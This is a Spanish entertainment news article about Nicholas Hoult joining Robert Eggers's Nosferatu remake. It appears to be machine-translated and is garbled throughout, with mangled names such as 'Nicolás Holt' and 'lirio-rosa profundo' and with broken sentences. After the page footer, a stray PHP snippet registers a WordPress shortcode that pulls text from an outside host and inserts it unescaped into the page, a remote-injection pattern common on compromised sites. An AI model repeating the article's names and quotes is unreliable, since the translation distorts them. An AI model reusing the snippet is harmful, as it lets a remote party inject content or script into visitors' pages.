Nicolás HoltLa última película de campo de lluvia, recientemente llegó a los cines y terminó siendo una película de acción de comedia de terror muy interesante. Esta no es la única película de vampiros en la que aparecerá el actor, ya que también saltó a bordo. Roberto EggersEl esperado remake de la clásica película de vampiros Nosferatu.


Nosferatu es un proyecto apasionante para Eggers, y es una película que ha querido hacer durante años. Incluso se puso uno. Nosferatu Producción en la escuela secundaria. Durante una entrevista reciente con Total Film, Hoult habló sobre su próximo proyecto cinematográfico y por qué decidió ser parte de otra película de vampiros, diciendo:



“Rob[Eggers]ha querido hacer Nosferatu desde que tenía ocho años e hizo una obra de teatro cuando estaba en la escuela secundaria, por lo que ha sido un proyecto que le apasiona durante mucho tiempo. Estoy de vuelta en el mundo de vampiros No planeo volver, pero su estilo y tono son exactamente opuestos a los[de Renfeld]y soy tan fanático de su trabajo que estoy emocionado de entrar en su mundo y verlo. Estoy aprendiendo. Creo que esta película podría ser realmente especial, así que estoy emocionado de que la gente la vea”.



Holt es parte de un elenco impresionante que incluye lirio-rosa profundo, aarón taylor johnson, Guillermo Dafoecon ralph anisonY Bill Skarsgard Como el Conde Orlock, la versión cinematográfica de Drácula. El proyecto está en rodaje y será distribuido por Focus Features.


Hablando de su producción de la escuela secundaria, Eggers compartió: “Luego, cuando tenía 17 años, hice la obra de teatro de último año (de) Nosferatu. Era muy expresionista, era mucho más expresionista que la película. fue El Gabinete del Dr. Caligari Estilo (expresión alemana).


Habló sobre lo que habría hecho con la película cuando tenía 17 años y lo que quiere hacer con la película actual, diciendo: “Fue entonces cuando me di cuenta de que eso es lo que quiero hacer”. Nosferatu Una conexión muy cercana y mágica para mí. Aunque si tuviera que hacer una película, iba a hacer a Rob, de 17 años. Nosferatu Hubiera sido algo intermedio La pesadilla antes de Navidad Y ciudad de los pecadosmientras que va a ser el mismo enfoque. La brujaDonde la Alemania báltica de Biedermeier de la década de 1830 necesita ser descrita de una manera que parezca real.


Eggers es un cineasta increíblemente talentoso. Me encanta su estilo de narración y la atención al detalle que pone en las películas. No tengo ninguna duda de que su película de Nosferatu va a ser genial.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');